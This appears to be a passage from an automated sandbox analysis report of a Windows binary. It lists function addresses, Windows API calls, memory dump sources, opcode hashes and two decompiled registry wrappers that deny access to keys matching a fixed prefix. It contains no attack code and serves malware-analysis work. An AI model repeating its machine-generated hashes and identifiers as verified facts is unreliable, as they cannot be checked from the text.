                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue$H_prolog3_catch__wmemset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2030589627-0
                                                                                                                        • Opcode ID: 89fcff527e000ae42aacffbbac0a854c03ad3806c169435f3b3f909df2c501a9
                                                                                                                        • Instruction ID: 8e503d48b3a9a5b00c99b4d92a2b8f21b7d638f9e343a6dbab2e137ec47b5f21
                                                                                                                        • Opcode Fuzzy Hash: 89fcff527e000ae42aacffbbac0a854c03ad3806c169435f3b3f909df2c501a9
                                                                                                                        • Instruction Fuzzy Hash: 354138B2801118AFDB05DF94DD95DEEBBB8FF54308F10402EF501A7290DA309E46CB64
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 005429A7, Relevance: 6.1, APIs: 4, Instructions: 70threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __calloc_crt.LIBCMT ref: 005429E2
                                                                                                                        • CreateThread.KERNEL32 ref: 00542A26
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,005276BF,00000000,00000000,00527610,?,00000004,?,?,?), ref: 00542A30
                                                                                                                        • __dosmaperr.LIBCMT ref: 00542A48
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 84609068-0
                                                                                                                        • Opcode ID: 72c65561eb2f8508996f698d031463a5aac21ee5c99a265e3bbf851d3e5b7ea5
                                                                                                                        • Instruction ID: 71d6a2fe3dbc70fe9c4961969bcf254d4d6348a84867b948ce607d6c1c091948
                                                                                                                        • Opcode Fuzzy Hash: 72c65561eb2f8508996f698d031463a5aac21ee5c99a265e3bbf851d3e5b7ea5
                                                                                                                        • Instruction Fuzzy Hash: F611273250521AAFDB20BFA4CC468DE7FA4FF4432CF60442DF901E3091DB7199409A64
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F337B70, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F337B70(void* _a4, WCHAR* _a8, int _a12, short* _a16, int _a20, int _a24, struct _SECURITY_ATTRIBUTES* _a28, void** _a32, int* _a36) {
				long _t12;
				WCHAR* _t13;
				WCHAR* _t22;

				_t22 = _a8;
				if(_t22 == 0) {
					L3:
					_t12 = RegCreateKeyExW(_a4, _t22, _a12, _a16, _a20, _a24, _a28, _a32, _a36); // executed
					return _t12;
				} else {
					_t13 = M6F34054C; // 0x78645c
					if(StrCmpNIW(_t22, _t13, 0x1c) != 0) {
						goto L3;
					} else {
						return 5;
					}
				}
			}






                                                                                                                        0x6f337b71
                                                                                                                        0x6f337b77
                                                                                                                        0x6f337b95
                                                                                                                        0x6f337bbe
                                                                                                                        0x6f337bc5
                                                                                                                        0x6f337b79
                                                                                                                        0x6f337b79
                                                                                                                        0x6f337b8a
                                                                                                                        0x00000000
                                                                                                                        0x6f337b8c
                                                                                                                        0x6f337b92
                                                                                                                        0x6f337b92
                                                                                                                        0x6f337b8a

                                                                                                                        APIs
                                                                                                                        • StrCmpNIW.SHLWAPI(?,0078645C,0000001C), ref: 6F337B82
                                                                                                                        • RegCreateKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6F337BBE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Create
                                                                                                                        • String ID: \dx
                                                                                                                        • API String ID: 2289755597-3316144491
                                                                                                                        • Opcode ID: 0f0b7bb08513aa8a537240607028e64ea6209cfc8f06f4674c6377a4e1a172f6
                                                                                                                        • Instruction ID: d0c64012d252ded8bd2e4cffba45c8a4f587b403eb9fd48553b62f64ea081ab6
                                                                                                                        • Opcode Fuzzy Hash: 0f0b7bb08513aa8a537240607028e64ea6209cfc8f06f4674c6377a4e1a172f6
                                                                                                                        • Instruction Fuzzy Hash: 77F01D72218650ABD304DA59D884DABB7FDFFCD724F048A0CB59897244C634ED11CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F337BD0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F337BD0(void* _a4, WCHAR* _a8, int _a12, int _a16, void** _a20) {
				long _t7;
				WCHAR* _t8;
				WCHAR* _t14;

				_t14 = _a8;
				if(_t14 == 0) {
					L3:
					_t7 = RegOpenKeyExW(_a4, _t14, _a12, _a16, _a20); // executed
					return _t7;
				} else {
					_t8 = M6F34054C; // 0x78645c
					if(StrCmpNIW(_t14, _t8, 0x1c) != 0) {
						goto L3;
					} else {
						return 2;
					}
				}
			}






                                                                                                                        0x6f337bd1
                                                                                                                        0x6f337bd7
                                                                                                                        0x6f337bf5
                                                                                                                        0x6f337c0a
                                                                                                                        0x6f337c11
                                                                                                                        0x6f337bd9
                                                                                                                        0x6f337bd9
                                                                                                                        0x6f337bea
                                                                                                                        0x00000000
                                                                                                                        0x6f337bec
                                                                                                                        0x6f337bf2
                                                                                                                        0x6f337bf2
                                                                                                                        0x6f337bea

                                                                                                                        APIs
                                                                                                                        • StrCmpNIW.SHLWAPI(?,0078645C,0000001C), ref: 6F337BE2
                                                                                                                        • RegOpenKeyExW.KERNEL32(?,?,?,?,?), ref: 6F337C0A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Open
                                                                                                                        • String ID: \dx
                                                                                                                        • API String ID: 71445658-3316144491
                                                                                                                        • Opcode ID: 0c7b019ab81fbcb0129a6cf6262eb85926935d472330c8ab3066a30da819fb1d
                                                                                                                        • Instruction ID: f5b9657d3a9e03e4d8a76d23d97bd5a12ec788d006bad21c6462854e62da286f
                                                                                                                        • Opcode Fuzzy Hash: 0c7b019ab81fbcb0129a6cf6262eb85926935d472330c8ab3066a30da819fb1d
                                                                                                                        • Instruction Fuzzy Hash: 05E06DB2618660EBD210DE18D844EAB77BCEF99B20F00C90DB95587201C730EC11CBB2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004D8737, Relevance: 4.6, APIs: 3, Instructions: 69registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004D873E
                                                                                                                        • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,00000008,004DDF46,?), ref: 004D8775
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,00000000,?,?,?,?,?,00000008,004DDF46,?), ref: 004D87C1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue$H_prolog3
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1173560166-0
                                                                                                                        • Opcode ID: 8b497e6277dae8fe07edea6679eab75e1394439edf18a7629113dac179907cf9
                                                                                                                        • Instruction ID: 0f4af20211d2536596288c9866dec7b9355c8039161fb1f7cf1f228bb3b07186
                                                                                                                        • Opcode Fuzzy Hash: 8b497e6277dae8fe07edea6679eab75e1394439edf18a7629113dac179907cf9
                                                                                                                        • Instruction Fuzzy Hash: A8214530A0021AAFDF14DF54CC51AEE7BA4FB49314F10421EF814AB390DB30AA06CBA4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 005276A0, Relevance: 4.5, APIs: 3, Instructions: 49threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 005276E7
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004BC352), ref: 0052770F
                                                                                                                        • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004BC352), ref: 0052771E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseExceptionException@8HandleRaiseResumeThreadThrow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2204380503-0
                                                                                                                        • Opcode ID: ea6e226bd51cb95a21794580d35d9e11eb9e4c09e62242be58ddf81457dcb3f6
                                                                                                                        • Instruction ID: 6daf75a6342c611759c37fe8ba76e13efef75d2f7602a7c0971ff2a5aa0f6ec0
                                                                                                                        • Opcode Fuzzy Hash: ea6e226bd51cb95a21794580d35d9e11eb9e4c09e62242be58ddf81457dcb3f6
                                                                                                                        • Instruction Fuzzy Hash: 3001D270204312AFE700DF5DDC85F56B7A8FF88325F048A18F56887291D774F8458BA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004BED5B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004BED62
                                                                                                                          • Part of subcall function 004B5743: __EH_prolog3.LIBCMT ref: 004B574A
                                                                                                                          • Part of subcall function 004B5743: LoadStringW.USER32(10000000,?,00000000,00000100), ref: 004B5794
                                                                                                                          • Part of subcall function 004B5743: LoadStringW.USER32(?,?,00000000,00000100), ref: 004B57CB
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 0040E8A9: __EH_prolog3.LIBCMT ref: 0040E8B0
                                                                                                                        Strings
                                                                                                                        • Callbacks.setLoggedIn: StatusChanged callback not set, xrefs: 004BEDEB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$LoadString$CriticalInitializeSection
                                                                                                                        • String ID: Callbacks.setLoggedIn: StatusChanged callback not set
                                                                                                                        • API String ID: 1365085155-3560364928
                                                                                                                        • Opcode ID: f5523d1dbd27c0eb8af0d6ba76e2a17c5b042296d9785dd9edb21dc9f5509da3
                                                                                                                        • Instruction ID: 9c5ed2ad15826aa4861ff9567c9ec0502a483661ad412179d4508a200c259eb2
                                                                                                                        • Opcode Fuzzy Hash: f5523d1dbd27c0eb8af0d6ba76e2a17c5b042296d9785dd9edb21dc9f5509da3
                                                                                                                        • Instruction Fuzzy Hash: 97113670A48384AADB04FF7E845F7DD3F649B81324F24426EF1461B2C2CA795646C3BA
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004BEE12, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004BEE19
                                                                                                                          • Part of subcall function 004BEB0F: __EH_prolog3.LIBCMT ref: 004BEB16
                                                                                                                        Strings
                                                                                                                        • Callbacks.setStatus: StatusChanged callback not set, xrefs: 004BEE6A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3
                                                                                                                        • String ID: Callbacks.setStatus: StatusChanged callback not set
                                                                                                                        • API String ID: 431132790-2963191105
                                                                                                                        • Opcode ID: 6c011e7366a570e6cb3643876c2659a84703e40e697df4c03c8364ba0953f8c9
                                                                                                                        • Instruction ID: c59b0351dd309f1b71822a8ba55792cf84c31506fae73b7dcfcbdcd58a86ebb2
                                                                                                                        • Opcode Fuzzy Hash: 6c011e7366a570e6cb3643876c2659a84703e40e697df4c03c8364ba0953f8c9
                                                                                                                        • Instruction Fuzzy Hash: 1B01F570A0520CEEDF01EFBA8416ACD3F20AF95348F00416EF441672C2CB39AA04D76A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0059F78E, Relevance: 3.1, APIs: 2, Instructions: 74threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNEL32 ref: 0059F7F6
                                                                                                                        • GetLastError.KERNEL32(?,0059E01A,?,?,?,?,?,?,?,?,?,?,000000A8,0059E794,00000000), ref: 0059F804
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateErrorLastThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1689873465-0
                                                                                                                        • Opcode ID: 6aca21f862a584d0e422e92cc17aeb67e9f561c234ce2d3980490fc732947141
                                                                                                                        • Instruction ID: 02eb256277fd3011e7d96370afe538692566390f669cd5e571c9265522b7124c
                                                                                                                        • Opcode Fuzzy Hash: 6aca21f862a584d0e422e92cc17aeb67e9f561c234ce2d3980490fc732947141
                                                                                                                        • Instruction Fuzzy Hash: 1711E7B5200619AFDF209FA49CC896B7F98FF45765B208A79F809CF152C6B9CC40C7A0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004D849A, Relevance: 3.0, APIs: 2, Instructions: 34registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004D84A1
                                                                                                                        • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,?,00000004,?,?,?,?,?,00000008,004C3112,Logging), ref: 004D84D4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3QueryValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2373586757-0
                                                                                                                        • Opcode ID: b5faff2b5efaeb4ccc6a9fcde92abf65efddc0ae47b2a56e377ef5ed276ff6c6
                                                                                                                        • Instruction ID: 0dd975fd7c406d8fed742dab09b0d1048cfa1e638da5dc08f150b9124276a540
                                                                                                                        • Opcode Fuzzy Hash: b5faff2b5efaeb4ccc6a9fcde92abf65efddc0ae47b2a56e377ef5ed276ff6c6
                                                                                                                        • Instruction Fuzzy Hash: 98F03C3190021AABDF15CF90CD14AEE7FB4FF55758F40821EF555A6290DB748A09CBA4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004D85BC, Relevance: 3.0, APIs: 2, Instructions: 33registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004D85C3
                                                                                                                        • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,?,00000004,00000008,004C2410), ref: 004D85F6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
